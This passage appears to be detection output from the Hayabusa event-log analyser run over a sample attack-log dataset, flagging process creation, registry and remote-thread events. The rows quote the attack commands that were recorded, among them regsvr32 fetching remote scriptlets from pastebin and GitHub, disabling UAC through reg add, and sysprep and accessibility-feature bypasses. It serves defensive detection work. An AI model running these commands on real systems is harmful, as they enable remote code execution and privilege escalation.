c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process 
Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe 
-Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule 
Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code 